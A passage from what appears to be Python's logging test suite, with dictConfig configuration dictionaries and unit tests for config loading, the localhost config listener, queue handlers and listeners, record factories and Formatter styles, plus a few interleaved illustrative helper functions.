'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
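    # (cfg:// references let one part of the dictionary point at another, so
    # the real definitions can live under arbitrary top-level keys such as
    # 'true_formatters' and 'handler_configs'; item access is also supported,
    # as in 'cfg://handler_configs[hand1]'.)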
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
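    # (the '.' key maps attribute names to values that dictConfig sets on the
    # constructed handler after creation, e.g. hand1.terminator = '!\n')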
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
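# Editorial sketch (not part of the test suite; the helper name and config
# values are illustrative assumptions): the version-1 dictConfig schema the
# configs above exercise, including 'ext://' resolution for external objects.
def _example_dictconfig():
    import logging
    import logging.config
    config = {
        'version': 1,  # required; only schema version 1 is supported
        'formatters': {
            'brief': {'format': '%(levelname)s ++ %(message)s'},
        },
        'handlers': {
            'console': {
                'class': 'logging.StreamHandler',
                'formatter': 'brief',
                'level': 'NOTSET',
                'stream': 'ext://sys.stdout',  # ext:// pulls in an external object
            },
        },
        'loggers': {
            'compiler.parser': {'level': 'DEBUG', 'handlers': ['console']},
        },
        'root': {'level': 'WARNING'},
    }
    logging.config.dictConfig(config)
    logging.getLogger('compiler.parser').info('configured via dictConfig')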
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
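# Minimal illustrative sketch (helper name is an assumption) of the
# Logger.getChild() identity checked above: a child obtained with a dotted
# suffix is the very same object getLogger() returns for the full dotted name.
def _example_get_child():
    import logging
    base = logging.getLogger('example.pkg')
    child = base.getChild('sub.module')
    assert child is logging.getLogger('example.pkg.sub.module')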
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
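# Hedged sketch of the record-factory hook tested above: setLogRecordFactory()
# swaps in a custom LogRecord subclass for every record created afterwards.
# The _example_* name is illustrative only; the old factory is restored.
def _example_record_factory():
    import logging
    class TaggedRecord(logging.LogRecord):
        pass
    old_factory = logging.getLogRecordFactory()
    logging.setLogRecordFactory(TaggedRecord)
    try:
        record = logging.makeLogRecord({'msg': 'hello'})
        assert isinstance(record, TaggedRecord)
    finally:
        logging.setLogRecordFactory(old_factory)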
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that the traceback is appended only once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
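# Minimal sketch (stdlib only; names are illustrative) of the QueueHandler /
# QueueListener pairing exercised above: the handler enqueues records, the
# listener drains the queue in a background thread and hands records to the
# real handlers.
def _example_queue_logging():
    import logging
    import logging.handlers
    import queue
    q = queue.Queue(-1)
    target = logging.StreamHandler()
    listener = logging.handlers.QueueListener(q, target)
    listener.start()
    try:
        logger = logging.getLogger('example.queue')
        logger.addHandler(logging.handlers.QueueHandler(q))
        logger.warning('routed through the queue')
    finally:
        listener.stop()  # flushes remaining records and joins the thread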
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged, then the QueueListener is stopped. The
test then drains everything from the queue. A failure indicates
that messages were not registered on the queue until _after_ the
QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
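# Editorial note (hedged): the hand-rolled UTC tzinfo above is equivalent to
# the stdlib datetime.timezone.utc available since Python 3.2.  A minimal
# illustration, not used by the tests:
def _example_utc_equivalence():
    import datetime
    dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, datetime.timezone.utc)
    assert dt.utcoffset() == datetime.timedelta(0)
    assert dt.tzname() == 'UTC'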
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
